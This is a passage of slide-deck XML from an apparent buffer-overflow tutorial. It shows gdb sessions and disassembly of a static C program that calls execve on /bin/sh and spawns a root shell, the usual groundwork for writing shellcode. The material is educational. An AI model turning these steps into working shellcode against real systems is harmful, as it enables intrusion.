            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) b *0x0804d9c5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1 at 0x804d9c5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Starting program: /home/bof_codes/linux/shellcode/exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1, 0x0804d9c5 in _exit ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) si</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Program exited normally.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# gcc -static -o shellcode shellcode.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# ./shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) disass main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Dump of assembler code for function main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d0 &lt;main+0&gt;:    push   %ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d1 &lt;main+1&gt;:    mov    %esp,%ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d3 &lt;main+3&gt;:    sub    $0x8,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d6 &lt;main+6&gt;:    and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d9 &lt;main+9&gt;:    mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481de &lt;main+14&gt;:   sub    %eax,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481e0 &lt;main+16&gt;:   movl   $0x808ef88,0xfffffff8(%ebp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481e7 &lt;main+23&gt;:   movl   $0x0,0xfffffffc(%ebp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481ee &lt;main+30&gt;:   sub    $0x4,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f1 &lt;main+33&gt;:   push   $0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f3 &lt;main+35&gt;:   lea    0xfffffff8(%ebp),%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f6 &lt;main+38&gt;:   push   %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f7 &lt;main+39&gt;:   pushl  0xfffffff8(%ebp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481fa &lt;main+42&gt;:   call   0x804d9f0 &lt;execve&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481ff &lt;main+47&gt;:   add    $0x10,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048202 &lt;main+50&gt;:   leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048203 &lt;main+51&gt;:   ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>End of assembler dump.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) b main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1 at 0x80481d6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Starting program: /home/bof_codes/linux/shellcode/shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1, 0x080481d6 in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) display/i $pc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481d6 &lt;main+6&gt;: and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/s 0x808ef88</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x808ef88 &lt;_IO_stdin_used+4&gt;:    "/bin/sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) i reg $esp $ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>esp            0xbfffe640       0xbfffe640</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>ebp            0xbfffe648       0xbfffe648</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) si</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d9 in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481d9 &lt;main+9&gt;: mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481de in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481de &lt;main+14&gt;:        sub    %eax,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481e0 in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481e0 &lt;main+16&gt;:        movl   $0x808ef88,0xfffffff8(%ebp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481e7 in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481e7 &lt;main+23&gt;:        movl   $0x0,0xfffffffc(%ebp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481ee in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481ee &lt;main+30&gt;:        sub    $0x4,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f1 in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481f1 &lt;main+33&gt;:        push   $0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f3 in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481f3 &lt;main+35&gt;:        lea    0xfffffff8(%ebp),%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f6 in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481f6 &lt;main+38&gt;:        push   %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f7 in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481f7 &lt;main+39&gt;:        pushl  0xfffffff8(%ebp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481fa in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481fa &lt;main+42&gt;:        call   0x804d9f0 &lt;execve&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/20x $esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe630:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800" b="1"/>
              <a:t>0x0808ef88      0xbfffe640      0x00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>      0x080480c9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe640:     0x0808ef88      0x00000000      0xbfffe858      0x080483f3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe650:     0x00000001      0xbfffe884      0xbfffe88c      0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe660:     0x00000000      0x00000000      0x00000003      0xbfffe6f2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe670:     0x756e694c      0x00000078      0x00000000      0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) disass __execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Dump of assembler code for function execve:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9f0 &lt;execve+0&gt;:  push   %ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9f1 &lt;execve+1&gt;:  mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9f6 &lt;execve+6&gt;:  mov    %esp,%ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9f8 &lt;execve+8&gt;:  test   %eax,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9fa &lt;execve+10&gt;: push   %edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9fb &lt;execve+11&gt;: push   %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9fc &lt;execve+12&gt;: mov    0x8(%ebp),%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9ff &lt;execve+15&gt;: je     0x804da06 &lt;execve+22&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da01 &lt;execve+17&gt;: call   0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da06 &lt;execve+22&gt;: mov    0xc(%ebp),%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da09 &lt;execve+25&gt;: mov    0x10(%ebp),%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da0c &lt;execve+28&gt;: push   %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
